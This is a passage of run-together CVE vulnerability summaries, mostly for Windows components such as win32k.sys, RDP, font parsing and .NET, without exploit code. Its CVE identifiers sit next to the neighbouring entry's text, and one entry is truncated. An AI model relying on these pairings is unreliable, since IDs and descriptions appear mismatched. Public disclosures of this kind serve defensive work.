win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2972] The (1) server and (2) agent components in CA ARCserve Backup r12.5, r15, and r16 on Windows do not properly validate RPC requests, which allows remote attackers to cause a denial of service (service crash) via a crafted request. [CVE-2012-2971] The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does not properly process RPC requests, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted request. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 